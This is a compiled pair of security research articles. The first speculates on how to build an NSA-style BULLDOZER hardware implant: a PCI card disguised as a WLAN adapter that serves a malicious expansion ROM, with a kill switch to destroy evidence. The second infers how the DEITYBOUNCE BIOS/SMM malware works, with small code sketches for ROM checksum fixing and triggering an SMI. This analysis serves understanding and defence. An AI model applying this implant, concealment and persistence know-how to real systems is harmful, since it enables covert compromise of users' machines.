Local bus in this context refers to the custom bus in the SMT8096 development kit—used for communication between the chips on the development kit boards. At this point we have made the important design decisions, we have picked the PCI hardware development kit to work with, and we have looked into the PCI-specific chip in the development kit. It’s time to get into the details of the design implementation. The steps to implement the design are as follows:

1. Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware code consists of initialization code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instruments TIC6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol.

2. The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM, because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, both at the logical and the physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) on the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip on the board to store the PCI expansion ROM code as well.
If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details. Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in the SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting the logical interconnections between the board components.

Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd.

Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instruments Module. TIM is a standard interconnection between boards using a Texas Instruments DSP chip and other board(s). I couldn’t find the latest version of the TIM specifications. However, you can find TIM version 1.01 on the net. Although TIM implies that a DSP should be connected via this interconnect, in reality anything that conforms to the specifications can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” the NVRAM into the SMT310Q carrier board later. Figure 6 shows that the QuickLogic V363EPC PCI bridge—marked as V3 PCI Bridge—connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from the QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus.
Now, let’s look at how the QuickLogic V363EPC exposes devices wired to the TIMs into the host x86/x64 CPU address space. The QuickLogic V363EPC uses so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically address ranges claimed by the PCI Base Address Registers (BARs) in the QuickLogic V363EPC. The QuickLogic V363EPC datasheet uses a different naming scheme for the PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation of the subject. You can compare the “standard” PCI configuration space registers explained there with the ones shown in Figure 7.

Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet.

Let’s look deeper into the “data transfer aperture” in the QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space on the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows a simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper).

Figure 8 QuickLogic V363EPC Aperture Logic

Figure 8 shows that the QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range, claimed by the PCI_BASE0 register.
This is the relevant excerpt from the QuickLogic V363EPC datasheet:

“4.1.8 Special Function Modes for PCI-to-Local Bus Apertures
PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.”

The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for accesses to the PCI expansion ROM chip. No other chip can claim transactions via the aperture. The XROMBAR in the QuickLogic V363EPC chip must be enabled in order to support the PCI expansion ROM. This is quite a complicated task. We must first find the default XROMBAR register value in the chip. The XROMBAR is named the PCI_ROM register in the QuickLogic V363EPC datasheet, as you can see in Figure 7. The datasheet mentions that the PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled, because its least significant bit is zero—per the PCI specification. However, this is not a problem, as the default values of the PCI configuration space registers in the QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in the QuickLogic V363EPC. One of the “strap” configurations instructs the QuickLogic V363EPC to “download” its PCI configuration space register default values from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip.
Figure 9 shows the “straps” option for the V363EPC PCI configuration space registers.

Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet.

Figure 9 shows there are two “straps” that control the default value initialization in the V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to a serial EEPROM, the PCI configuration space register default values will be initialized from the serial EEPROM. The SDA and SCL pins adhere to the I2C protocol. I2C is a serial protocol to connect microcontrollers and other peripheral chips in a cost-efficient manner, i.e. with as small a number of pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL for Serial Clock.

Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet.

Figure 10 shows the circuit schematic that implements loading the default PCI configuration space registers from EEPROM. Now we know how to “force” the V363EPC PCI configuration space register default values to our liking. Once the pull-up resistors are set up to configure the QuickLogic V363EPC to use a serial EEPROM, the QuickLogic V363EPC PCI configuration space register default values are stored in the serial EEPROM and automatically loaded into the QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via the contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled. Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register—highlighted in a red box in Figure 7—controls whether the PCI_ROM register is enabled or not.
It also controls the size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into the details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for the PCI_MAP0 register from the QuickLogic V363EPC datasheet.

Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet

Figure 11 shows the ROM_SIZE bits in the PCI_MAP0 register highlighted in yellow. These bits determine the size of the PCI expansion ROM to be decoded by the QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with a size of up to 64KB. Perhaps this size is not up to what a malicious PCI expansion ROM payload requires. However, malicious PCI expansion ROM code can load additional code from other memory storage on the PCI add-in card when the ROM code executes. You must configure the ROM_SIZE bits’ default value to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW mean that the default values of those bits are determined by the contents of the serial EEPROM if serial EEPROM support is activated via the SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values. There is one more PCI configuration space register to take into account to implement the BULLDOZER hardware: the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, sub-class and interface. Figure 12 shows the class code selections for the PCI Wireless Controller class of devices.

Figure 12 PCI Wireless Controller Class Code

As you can see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B. Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip.
All you need to do is store the correct class code in the serial EEPROM used to initialize the contents of the QuickLogic V363EPC PCI configuration space registers. This way our BULLDOZER design conforms nicely to the PCI specification. At this point we can control the QuickLogic V363EPC PCI configuration space registers’ default values. We have also gained the knowledge required to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we store the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to the SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process of designing the interconnection is similar to what we have done for the PCI expansion ROM chip, except that we must expose the chip to code running on the host x86/x64 CPU via a different aperture, for example by using PCI-to-Local Aperture 1. Now we know everything we need to implement the BULLDOZER hardware. There is one more thing left, though: the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving the BULLDOZER hardware gets botched.

Implementing the “Kill Switch”: Military-Grade Electronics Speculation

It’s standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, rendering the hardware or software beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence implicating you in the event that an operation fails. Second, you don’t want your adversary to learn your highly valued technology. There are other strategic reasons to have a kill switch, but those two suffice to conduct research into implementing a kill switch in BULLDOZER.
BULLDOZER is hardware that consists of several electronic chips “bound” together via a circuit board. Therefore, what we need to know is a technique to destroy the key chips on a circuit board at a moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration in it. From Wikipedia:

Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms.

Electromigration in simple terms means the breakdown of the metal interconnect inside a semiconductor chip due to migration of the metal ions that make up the interconnect to an unwanted location. To put it simply, electromigration causes the metal interconnect inside the chip to be destroyed, akin to—but different from—corrosion in metal subjected to a harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an electromigration illustration. As you can see, the copper ion (Cu+) moves in the opposite direction from the electrons. The copper ion was previously part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration.

Figure 13 Electromigration. Courtesy: Wikipedia

There are many ways to induce electromigration in a semiconductor chip. However, I will focus on only one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip.
Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function were suddenly destroyed, it would raise suspicion in the target. One of the ways to create a large voltage inside an electronic circuit is by using a so-called “charge pump”. A charge pump is a DC-to-DC converter that uses capacitors as energy storage elements to create either a higher or lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs.

Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia

Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiple of the input voltage. As you can see, we can create a voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It was made of discrete electronic parts. The output voltage is usually not an exact multiple of the input voltage due to losses in the “multiplier” circuit. I suspect that a charge pump implemented inside a semiconductor chip provides a better “voltage multiplication” function than a discrete one. At this point, we have all the things needed to create a kill switch. You only need to incorporate the charge pump into your circuit design. You can use a control register in an FPGA to feed the logic that decides whether to activate the charge pump or not. You can devise certain byte patterns to turn on the charge pump and destroy your prized malicious logic parts in the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of many.
I present it here merely out of my “intuition” for solving the problem of creating a kill switch. The military surely has more tricks up their sleeve.

BULLDOZER Implementation Recap

We have gathered all the techniques needed to build “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions from the beginning of this article. The recap is as follows:

- BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card.

- BULLDOZER implements a PCI expansion ROM, because that is the delivery mechanism used to “inject” GINSU malware code into the x86/x64 host system.

- BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT.

- BULLDOZER was designed using SDR FPGA prototyping tools before being fabricated as an ASIC in the NSA’s semiconductor fab. The NSA could use either Altera, Xilinx or internally developed FPGA prototyping tools.

- BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of the PCI expansion ROM chip exposed through the XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code, though.

- It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or whether more are required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough.

- A possibility not covered in this article is that the NSA licensed the design for the non-stealthy PCI WLAN controller chip part of BULLDOZER from commercial vendors such as Broadcom or Ralink.
This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is the BULLDOZER PCI chip being a multifunction PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here, though. As for the chip marking for the BULLDOZER PCI WLAN controller chip, it could easily be carried out by the NSA fab. Well, with the right tool, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “Bunnie” Huang’s blog: Qué romántico! « bunnie's blog. That is all for our BULLDOZER implementation recap. It was quite a long journey, but we now have a clearer picture of the BULLDOZER hardware implementation.

Closing Thoughts: BULLDOZER Evolution

Given that BULLDOZER was fielded almost six years ago, the present-day BULLDOZER cranking out of the NSA’s fab must have evolved, perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article to PCI Express (PCIe), though. PCIe is compatible with PCI at the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of the BULLDOZER design explained here, and the NSA shouldn’t have any difficulty carrying out the protocol conversion. We should look into the “evolved” BULLDOZER in the future.

By Darmawan Salihun|February 14th, 2014

Source: NSA Backdoor Part 2, BULLDOZER: And, Learn How to DIY a NSA Hardware Implant - InfoSec Institute
7. NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE

This article is the first part of a series on NSA BIOS backdoor internals. Before we begin, I’d like to point out why these malware families are classified as “god mode.” First, most of them use internal (NSA) codenames in the realm of “gods,” such as DEITYBOUNCE, GODSURGE, etc. Second, they have capabilities similar to “god mode” cheats in video games, which make the player using them close to invincible. This is the case with this type of malware because it is very hard to detect and remove, even with the most sophisticated anti-malware tools, during its possible deployment timeframe. This part of the series focuses on the DEITYBOUNCE malware described in the NSA ANT server document, leaked by Edward Snowden. The analysis presented in this article is based on the technical implications of the information provided by the document. The document lacks many technical specifics, but based on the BIOS technology of the day DEITYBOUNCE became operational, we can infer some technically sound hypotheses—or conclusions, if you prefer.

Introduction to DEITYBOUNCE Malware

DEITYBOUNCE operates as part of the system shown in Figure 1. Figure 1 shows several peculiar terms, such as ROC, SNEAKERNET, etc. Some of these terms are used internally by the NSA. ROC is an abbreviation for Remote Operations Center. The ROC acts as the NSA’s point of control over the target system; it’s located outside the NSA’s headquarters. SNEAKERNET is a fabulous term for the physical delivery of data, i.e., using humans to move data between computers by moving removable media such as magnetic tape, floppy disks, compact discs, USB flash drives (thumb drives, USB sticks), or external hard drives from one computer to another.

Figure 1 DEITYBOUNCE Extended Concept of Operation

Figure 1 shows DEITYBOUNCE targeting the machines marked with a red dot.
DEITYBOUNCE itself is not installed on those machines, because DEITYBOUNCE targets the Dell PowerEdge 1850/2850/1950/2950 RAID server series with BIOS versions A02, A05, A06, 1.1.0, 1.2.0, or 1.3.7, not laptops or desktops/workstations. This means DEITYBOUNCE is installed in servers accessed by the laptops or desktops/workstations marked with red dots. The red dots also mean that the target systems could act as “jump hosts” used to implant DEITYBOUNCE in the target servers. Figure 1 also shows the presence of ARKSTREAM. ARKSTREAM is basically a dropper which contains BIOS flashing and malware installation functions. ARKSTREAM can install DEITYBOUNCE on the target server either via exploits controlled remotely (network infection) or via USB thumb drive infection. This infection method, in a way, is very similar to the STUXNET malware dropper. ARKSTREAM installs DEITYBOUNCE via BIOS flashing, i.e., replacing the PowerEdge server BIOS with one that is “infected” by the DEITYBOUNCE malware. The NSA ANT server document doesn’t divulge minute details explaining DEITYBOUNCE’s “technical context” of operation. However, we can infer some parts of the “technical context” from the DEITYBOUNCE technical requirements mentioned in the document. These are the important technical details revealed by the NSA ANT server document:

- DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing System Management Mode (SMM) to gain periodic execution while the operating system (OS) loads.

- DEITYBOUNCE supports multiprocessor systems with RAID hardware and Microsoft Windows 2000, XP, and 2003 Server.

- Once implanted, DEITYBOUNCE’s frequency of execution (dropping the payload) is configurable and will occur when the target machine powers on.

In later sections, we will look into the DEITYBOUNCE malware architecture in more detail, based on these technical details. These details provide a lot more valuable hints than you might think.
But before that, you need to have some important background knowledge.

A Closer Look at Dell PowerEdge Hardware

Let’s start with the first item of background knowledge. In the previous section, we learned that DEITYBOUNCE targets the Dell PowerEdge 1850/2850/1950/2950 RAID server series. Therefore, we need to look into these servers more closely to understand the DEITYBOUNCE execution environment. One can download the relevant server specifications from these links:

- Dell PowerEdge 1950 specification: http://www.dell.com/downloads/global/products/pedge/en/1950_specs.pdf

- Dell PowerEdge 2950 specification: http://www.dell.com/downloads/global/products/pedge/en/2950_specs.pdf

The server specifications are rather ordinary. However, if you look more closely at the storage options of both server types, you’ll notice the option to use a RAID controller in both server types. The RAID controller is of the type PERC 5/i, PERC4e/DC, or PERC 5/e. We focus on the RAID controller hardware because the DEITYBOUNCE technical details mention the presence of RAID as one of its hardware “requirements.” Now let’s move into a more detailed analysis. You can download the user guide for the Dell PERC family of RAID controllers from: ftp://ftp.dell.com/Manuals/Common/dell-perc-4-dc_User’s%20Guide_en-us.pdf. Despite the fact that the document is only a user guide, it provides important information, as follows:

- PERC stands for PowerEdge Expandable RAID Controller. This means the PERC series of RAID controllers are either white-labeled by Dell or developed internally by Dell.

- There are several types of PERC RAID controllers. The ones with the XX/i moniker are the integrated versions, the XX/SC moniker means that the RAID controller is single channel, the XX/DC moniker means that the RAID controller is dual channel, and the XXe/XX moniker signifies that the RAID controller uses PCI Express (PCIe) instead of the PCI bus. If the last moniker is missing, it implies that the RAID controller uses PCI, not PCIe.
All PERC variants have 1MB of onboard flash ROM. Mind you, this is not the PowerEdge server motherboard flash ROM but the PERC RAID controller's (exclusive) flash ROM. It's used to initialize and configure the RAID controller. All PERC variants have NVRAM to store their configuration data. The NVRAM is located on the PERC adapter board, except when the PERC is integrated into the motherboard. The PERC RAID controller flash ROM size (1MB) is huge from the firmware code point of view. Therefore, anyone can insert an advanced (read: large in code size) malicious firmware-level module into it. I can't find information on the Dell PowerEdge 1850/2850/1950/2950 BIOS chip size. However, the size of their compressed BIOS files is larger than 570KB. Therefore, it's safe to assume that the motherboard BIOS chip size is at least 1MB because, AFAIK, there is no flash ROM chip (used to store BIOS code) with a size between 570KB and 1MB. The closest flash ROM size above 570KB is 1MB. This fact also presents a huge opportunity to place BIOS malware in the motherboard BIOS besides the RAID controller expansion ROM. Initial Program Loader (IPL) Device Primer The second item of background knowledge you need to know pertains to the IPL device. A RAID controller or other storage controller is an attractive victim for firmware malware because it is an IPL device, as per the BIOS boot specification. The BIOS boot specification and PCI specification dictate that IPL device firmware must be executed at boot if the IPL device is in use. IPL device firmware is mostly implemented as a PCI expansion ROM. Therefore, IPL device firmware is always executed, assuming the IPL device is in use. This fact opens a path for firmware-level malware to reside in the IPL device firmware, particularly if the malware has to be executed at every boot or on a certain trigger at boot. For more details on IPL device firmware execution, see: https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2. 
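As background for how the BIOS decides to run such firmware: a legacy PCI expansion ROM is only executed if its header checks out, so any implant that edits the image must keep the checksum valid. Here is a minimal sketch of that check and fix-up; the 512-byte dummy image and the choice of the last byte as the checksum byte are illustrative assumptions, not details from the DEITYBOUNCE document:

```python
def fix_expansion_rom(image: bytearray) -> bytearray:
    """Validate and re-checksum a legacy PCI expansion ROM image.

    Per the PCI spec, the image starts with the signature 0x55 0xAA,
    byte 2 gives the image size in 512-byte units, and all bytes must
    sum to 0 mod 256 before the BIOS will far-call the INIT entry at
    offset 3. The last byte is used here as the checksum byte (a
    common, but not mandated, choice)."""
    assert image[0] == 0x55 and image[1] == 0xAA, "bad ROM signature"
    assert len(image) == image[2] * 512, "size field mismatch"
    image[-1] = 0
    image[-1] = (-sum(image)) & 0xFF  # force the byte sum to 0 mod 256
    return image

# A minimal one-unit (512-byte) dummy ROM, made checksum-valid.
rom = bytearray(512)
rom[0], rom[1], rom[2] = 0x55, 0xAA, 1
fix_expansion_rom(rom)
```

An implant that appends code to the image would re-run exactly this fix-up so the BIOS still accepts and executes the ROM.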
You need to take a closer look at the boot connection vector (BCV) in the PCI expansion ROM in that article. The system BIOS calls or jumps into the BCV during bootstrap to start the bootloader, which then loads and executes the OS. The BCV is implemented in the PCI expansion ROM of the storage controller device. Therefore, the PERC RAID controller in Dell PowerEdge servers should implement a BCV as well to conform to the BIOS boot specification. IPL device PCI expansion ROMs also have a peculiarity. In some BIOS implementations, they are always executed, whether or not the IPL device is being used. The reason is that the BIOS code very probably only checks the PCI device subclass code and interface code in its PCI configuration registers. See the "PCI PnP Expansion ROM Peculiarity" section at https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2#pci_pnp_rom_peculiarity. System Management Mode (SMM) Primer The third item of background knowledge needed to understand DEITYBOUNCE is SMM. A seminal work on SMM malware can be found in the Phrack ezine article "A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers." SMI, in this context, means system management interrupt. The Phrack article contains the knowledge required to understand how an SMM rootkit might work. There is one thing that needs to be updated in that Phrack article, though. Recent and present-day CPUs don't use the high segment (HSEG) anymore to store SMM code. Only the top-of-memory segment (TSEG) is used for that purpose. If you're not familiar with HSEG and TSEG, you can refer to System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute and System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute for details on the HSEG and TSEG locations in the CPU memory space. This means, for maximum forward compatibility, DEITYBOUNCE very possibly only uses TSEG in its SMM component. 
Entering SMM via software SMI in x86/x64 is quite simple. All you need to do is write a certain value to a particular I/O port address. A write transaction to this I/O port is interpreted by the chipset as a request to enter SMM; therefore, the chipset sends an SMI signal to the CPU to enter SMM. There are certain x86/x64 CPUs that directly "trap" this kind of I/O write transaction and interpret it as a request to enter SMM without passing anything to the chipset first. The complete algorithm to enter SMM is as follows: 1. Initialize the DX register with the SMM "activation" port. Usually, the SMM "activation" port is port number 0xB2. However, it could be a different port, depending on the specific CPU and chipset combination. You have to resort to their datasheets for the details. 2. Initialize the AX register with the SMI command value. 3. Enter SMM by writing the AX value to the output port contained in the DX register. As for the methods to pass parameters to the SMI handler routine, they are not covered extensively by the Phrack article. Therefore, we will have a look at the methods here. Some SMM code (SMI handler) needs to communicate with other BIOS modules or with software running inside the OS. The communication mechanism is carried out through parameter passing between the SMM code and code running outside SMM. Parameter passing between a BIOS module and an SMI handler is generally carried out using one of these mechanisms: Via the global non-volatile storage (GNVS). GNVS is part of the ACPI v4.0 Specification and is named ACPI non-volatile storage (NVS) in the ACPI specification. However, in some patent descriptions, NVS stands for non-volatile sleeping memory because the memory region occupied by NVS in RAM stores data that's preserved even if the system is in sleep mode. Either term refers to the same region in RAM. Therefore, the discrepancies in naming can be ignored. GNVS or ACPI NVS is part of RAM managed by the ACPI subsystem in the BIOS. 
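The three steps above can be sketched as follows. The port write is stubbed out, because on real hardware it is a privileged `out` instruction executed in ring 0, and the 0xDE command value is a made-up placeholder, not a documented SMI command:

```python
SMI_CMD_PORT = 0xB2  # the usual SMM "activation" port; chipset-specific

def trigger_software_smi(outb, smi_command):
    """Software-SMI sequence: DX <- port, AX <- command, OUT.

    `outb` stands in for the privileged port-write instruction
    (the `out dx, al` form, sending the command's low byte), so the
    sequence can be exercised without ring-0 access."""
    outb(SMI_CMD_PORT, smi_command & 0xFF)  # chipset raises SMI# to the CPU

# Record the write instead of touching real hardware.
writes = []
trigger_software_smi(lambda port, value: writes.append((port, value)), 0xDE)
```

On real hardware a single such write is enough: the chipset latches the command value and asserts SMI, and the CPU enters SMM at the next instruction boundary.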
GNVS stores various data. It is not managed by the OS, but is reachable by the OS through the ACPI source language (ASL) interface. In Windows, parts of this region are accessible through the Windows Management Instrumentation (WMI) interface. Via general-purpose registers (GPRs) in the x86/x64 architecture, i.e., RAX/EAX, RBX/EBX, RDX/EDX, etc. In this technique, a physical address pointer is passed via a GPR to the SMI handler code. Because the system state, including the register values, is saved to the "SMM save state," the code in the SMM area (the SMI handlers) is able to read the pointer value. The catch is that both the SMI handler and the code that passes the parameter(s) must agree on the "calling convention," i.e., which register(s) to use. Knowing how parameters are passed between a BIOS module and an SMI handler is important because DEITYBOUNCE uses this mechanism extensively when it runs. We will look into it in more detail in later sections. Precursor to DEITYBOUNCE Malware Architecture As with other software, we can infer the DEITYBOUNCE malware architecture from its execution environment. The NSA ANT server document mentions three technical hints, as you can see in the Introduction section. We'll delve into them one by one to uncover the possible DEITYBOUNCE architecture. The need for RAID hardware means that DEITYBOUNCE contains malware implanted in the RAID controller PCI expansion ROM. The RAID controller used in the Dell PowerEdge 1950 server is the PERC 5/i, PERC4e/DC, or PERC 5/e adapter card. All of these RAID controllers are either PCI or PCI Express (PCIe) RAID controllers. You have to pay attention to the fact that PCI expansion ROM here also includes PCIe expansion ROM, because both are virtually the same. I have covered PCI expansion ROM malware basics in another article. See Malicious Code Execution in PCI Expansion ROM - InfoSec Institute for the details. 
The presence of a payload being dropped by DEITYBOUNCE means DEITYBOUNCE is basically a "second-stage" malware dropper; the first stage is the ARKSTREAM malware dropper. DEITYBOUNCE probably provides only these two core functions: The first is as a persistent and stealthy dropper of malware modules. The second is to provide a "stealth" control function to other OS-specific malware modules. The malware modules could run during OS initialization, from inside a running OS, or in both scenarios. The OS-specific malware communicates with DEITYBOUNCE via SMM calls. The DEITYBOUNCE core functions above imply that there are possibly three kinds of malware components required for DEITYBOUNCE to work, as follows: 1. A persistent "infected" PCI expansion ROM. This module contains a routine to configure DEITYBOUNCE's frequency of execution. The routine possibly stores the configuration in the RAID controller NVRAM. This module also contains the tainted interrupt 13h (int 13h) handler that can call other routines via SMI to patch the kernel of the currently loading OS. 2. SMI handler code implanted in the PowerEdge motherboard BIOS to serve the software (SW) SMI calls from the "infected" RAID controller PCI expansion ROM. 3. An OS-specific malware payload running in Windows 2000, Windows Server 2003, or Windows XP. At this point we already know the DEITYBOUNCE malware components. This doesn't imply that we would be able to know the exact architecture of the malware, because there are several possible pathways through which to implement the components. However, I present the most probable architecture here. This is an educated guess. There could be inaccuracies because I don't have a sample DEITYBOUNCE binary to back up my assertions. But I think the guesses should be close enough, given the nature of x86/x64 firmware architecture. If you could provide a binary sample with suspected DEITYBOUNCE in it, I'm open to analyzing it, though. 
DEITYBOUNCE Malware Architecture We need to make several assumptions before proceeding to the DEITYBOUNCE architecture. This should make it easier to pinpoint the technical details of DEITYBOUNCE. These are the assumptions: 1. The BIOS used by the Dell PowerEdge targets is a legacy BIOS, not EFI/UEFI. This assumption is strengthened by the NSA ANT server document, which mentions the target OS as Windows 2000/XP/2003. None of these operating systems provides mature EFI/UEFI support. All user manuals, including the BIOS setup user manual, don't indicate any menu related to UEFI/EFI support, such as booting in legacy BIOS mode. Therefore, it's safe to assume that the BIOS is a legacy BIOS implementation. Moreover, at the launch time of DEITYBOUNCE, EFI/UEFI support in the market was still immature. 2. The custom SMI handler routines required to patch the OS kernel during bootstrap are larger than the empty space available in the motherboard BIOS. Therefore, the routines must be placed into two separate flash ROM chips, i.e., the PERC RAID controller flash ROM chip and the Dell PowerEdge motherboard flash ROM chip. This may not be the case, but let's just make an assumption here, because even a rudimentary NTFS driver would require at least several tens of kilobytes of space when compressed, not to mention a complicated piece of malware designed to patch the kernels of three different operating systems. The assumptions above have several consequences for our alleged DEITYBOUNCE architecture. The first one is that there are two stages in DEITYBOUNCE execution. The second one is that the malware code that patches the target OS kernel during bootstrap (interrupt 19h) runs in SMM. Now let's look into the DEITYBOUNCE execution stages. The DEITYBOUNCE execution stages are as follows: Stage 1: PCI expansion ROM initialization during power-on self-test (POST). 
